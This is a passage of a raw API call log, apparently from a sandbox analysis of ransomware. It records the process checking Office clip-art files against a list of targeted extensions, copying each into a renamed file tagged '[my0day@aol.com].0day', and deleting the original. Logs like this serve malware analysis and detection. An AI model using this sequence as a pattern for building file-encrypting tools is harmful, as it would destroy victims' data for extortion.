returned -1 [0271.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0271.186] lstrlenW (lpString=".1cd") returned 4 [0271.186] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0271.186] lstrlenW (lpString=".jpg") returned 4 [0271.186] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0271.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0271.186] lstrlenW (lpString=".doc") returned 4 [0271.186] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.186] lstrlenW (lpString=".docx") returned 5 [0271.186] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.186] lstrlenW (lpString=".pdf") returned 4 [0271.186] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.186] lstrlenW (lpString=".xls") returned 4 [0271.186] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.187] lstrlenW (lpString=".xlsx") returned 5 [0271.187] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.187] lstrlenW (lpString=".ppt") returned 4 [0271.187] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0271.187] lstrlenW (lpString=".zip") returned 4 [0271.187] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.187] lstrlenW (lpString=".rar") returned 4 [0271.187] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.187] lstrlenW (lpString=".bz2") returned 4 [0271.187] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.187] lstrlenW (lpString=".7z") returned 3 [0271.187] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0271.187] lstrlenW (lpString=".dbf") returned 4 [0271.187] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0271.187] lstrlenW (lpString=".1cd") returned 4 [0271.187] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 63 [0271.187] lstrlenW (lpString=".jpg") returned 4 [0271.187] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.187] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.187] lstrlenW (lpString="BS00441_.WMF") returned 12 [0271.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.188] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3524) returned 1 [0271.188] CloseHandle (hObject=0x2cc) returned 1 [0271.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf")) returned 0x20 [0271.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.188] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.188] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.189] GetLastError () returned 0x0 [0271.189] ReadFile (in: hFile=0x2cc, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0xdc4, lpOverlapped=0x0) returned 1 [0271.202] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xdd0, lpOverlapped=0x0) returned 1 [0271.204] ReadFile (in: hFile=0x2cc, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0271.204] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.204] SetEndOfFile (hFile=0x384) returned 1 [0271.204] CloseHandle (hObject=0x384) returned 1 [0271.204] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.204] SetEndOfFile (hFile=0x2cc) returned 1 [0271.207] CloseHandle (hObject=0x2cc) returned 1 [0271.207] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.207] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf")) returned 1 [0271.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0271.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0271.207] lstrlenW (lpString=".doc") returned 4 [0271.207] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.207] lstrlenW (lpString=".docx") returned 5 [0271.207] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.207] lstrlenW (lpString=".pdf") returned 4 [0271.207] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.207] lstrlenW (lpString=".xls") returned 4 [0271.207] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.207] lstrlenW (lpString=".xlsx") returned 5 [0271.207] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.207] lstrlenW (lpString=".ppt") returned 4 [0271.207] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0271.208] lstrlenW (lpString=".zip") returned 4 [0271.208] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.208] lstrlenW (lpString=".rar") returned 4 [0271.208] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.208] lstrlenW (lpString=".bz2") returned 4 [0271.208] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.208] lstrlenW (lpString=".7z") returned 3 [0271.208] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0271.208] lstrlenW (lpString=".dbf") returned 4 [0271.208] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0271.208] lstrlenW (lpString=".1cd") returned 4 [0271.208] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0271.208] lstrlenW (lpString=".jpg") returned 4 [0271.208] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0271.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0271.208] lstrlenW (lpString=".doc") returned 4 [0271.208] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.208] lstrlenW (lpString=".docx") returned 5 [0271.208] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.208] lstrlenW (lpString=".pdf") returned 4 [0271.208] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.208] lstrlenW (lpString=".xls") returned 4 [0271.208] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.208] lstrlenW (lpString=".xlsx") returned 5 [0271.208] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.208] lstrlenW (lpString=".ppt") returned 4 [0271.208] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0271.209] lstrlenW (lpString=".zip") returned 4 [0271.209] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.209] lstrlenW (lpString=".rar") returned 4 [0271.209] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.209] lstrlenW (lpString=".bz2") returned 4 [0271.209] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.209] lstrlenW (lpString=".7z") returned 3 [0271.209] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0271.209] lstrlenW (lpString=".dbf") returned 4 [0271.209] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0271.209] lstrlenW (lpString=".1cd") returned 4 [0271.209] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 63 [0271.209] lstrlenW (lpString=".jpg") returned 4 [0271.209] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.209] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.209] lstrlenW (lpString="BS00442_.WMF") returned 12 [0271.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.209] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2488) returned 1 [0271.209] CloseHandle (hObject=0x2cc) returned 1 [0271.210] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf")) returned 0x20 [0271.210] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.210] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.210] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.210] GetLastError () returned 0x0 [0271.210] ReadFile (in: hFile=0x2cc, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x9b8, lpOverlapped=0x0) returned 1 [0271.224] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x9c0, lpOverlapped=0x0) returned 1 [0271.290] ReadFile (in: hFile=0x2cc, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0271.290] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.290] SetEndOfFile (hFile=0x384) returned 1 [0271.290] CloseHandle (hObject=0x384) returned 1 [0271.290] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.290] SetEndOfFile (hFile=0x2cc) returned 1 [0271.299] CloseHandle (hObject=0x2cc) returned 1 [0271.299] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.315] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf")) returned 1 [0271.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0271.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0271.315] lstrlenW (lpString=".doc") returned 4 [0271.315] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.315] lstrlenW (lpString=".docx") returned 5 [0271.315] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.315] lstrlenW (lpString=".pdf") returned 4 [0271.316] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.316] lstrlenW (lpString=".xls") returned 4 [0271.316] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.316] lstrlenW (lpString=".xlsx") returned 5 [0271.316] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.316] lstrlenW (lpString=".ppt") returned 4 [0271.316] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0271.316] lstrlenW (lpString=".zip") returned 4 [0271.316] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.316] lstrlenW (lpString=".rar") returned 4 [0271.316] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.316] lstrlenW (lpString=".bz2") returned 4 [0271.316] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.316] lstrlenW (lpString=".7z") returned 3 [0271.316] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0271.316] lstrlenW (lpString=".dbf") returned 4 [0271.316] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0271.316] lstrlenW (lpString=".1cd") returned 4 [0271.316] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0271.316] lstrlenW (lpString=".jpg") returned 4 [0271.316] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0271.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0271.316] lstrlenW (lpString=".doc") returned 4 [0271.316] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.316] lstrlenW (lpString=".docx") returned 5 [0271.316] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.316] lstrlenW (lpString=".pdf") returned 4 [0271.316] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.316] lstrlenW (lpString=".xls") returned 4 [0271.317] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.317] lstrlenW (lpString=".xlsx") returned 5 [0271.317] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.317] lstrlenW (lpString=".ppt") returned 4 [0271.317] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0271.317] lstrlenW (lpString=".zip") returned 4 [0271.317] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.317] lstrlenW (lpString=".rar") returned 4 [0271.317] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.317] lstrlenW (lpString=".bz2") returned 4 [0271.317] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.317] lstrlenW (lpString=".7z") returned 3 [0271.317] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0271.317] lstrlenW (lpString=".dbf") returned 4 [0271.317] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0271.317] lstrlenW (lpString=".1cd") returned 4 [0271.317] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.317] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 63 [0271.317] lstrlenW (lpString=".jpg") returned 4 [0271.317] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.317] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.318] lstrlenW (lpString="BS00443_.WMF") returned 12 [0271.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0271.318] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1676) returned 1 [0271.318] CloseHandle (hObject=0x2cc) returned 1 [0271.318] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf")) returned 0x20 [0271.324] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.343] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.343] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.343] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0271.945] GetLastError () returned 0x0 [0271.945] ReadFile (in: hFile=0x384, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x68c, lpOverlapped=0x0) returned 1 [0271.947] WriteFile (in: hFile=0x38c, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x690, lpOverlapped=0x0) returned 1 [0271.948] ReadFile (in: hFile=0x384, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0271.948] WriteFile (in: hFile=0x38c, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.948] SetEndOfFile (hFile=0x38c) returned 1 [0271.948] CloseHandle (hObject=0x38c) returned 1 [0271.948] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0271.948] SetEndOfFile (hFile=0x384) returned 1 [0271.951] CloseHandle (hObject=0x384) returned 1 [0271.951] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.969] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf")) returned 1 [0271.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0271.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0271.970] lstrlenW (lpString=".doc") returned 4 [0271.970] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.970] lstrlenW (lpString=".docx") returned 5 [0271.970] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.970] lstrlenW (lpString=".pdf") returned 4 [0271.970] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.970] lstrlenW (lpString=".xls") returned 4 [0271.970] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.970] lstrlenW (lpString=".xlsx") returned 5 [0271.970] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.970] lstrlenW (lpString=".ppt") returned 4 [0271.970] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0271.971] lstrlenW (lpString=".zip") returned 4 [0271.971] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.971] lstrlenW (lpString=".rar") returned 4 [0271.971] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.971] lstrlenW (lpString=".bz2") returned 4 [0271.971] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.971] lstrlenW (lpString=".7z") returned 3 [0271.971] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0271.971] lstrlenW (lpString=".dbf") returned 4 [0271.971] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0271.971] lstrlenW (lpString=".1cd") returned 4 [0271.971] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0271.971] lstrlenW (lpString=".jpg") returned 4 [0271.971] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0271.971] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 63 [0271.971] lstrlenW (lpString=".doc") returned 4 [0271.971] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.971] lstrlenW 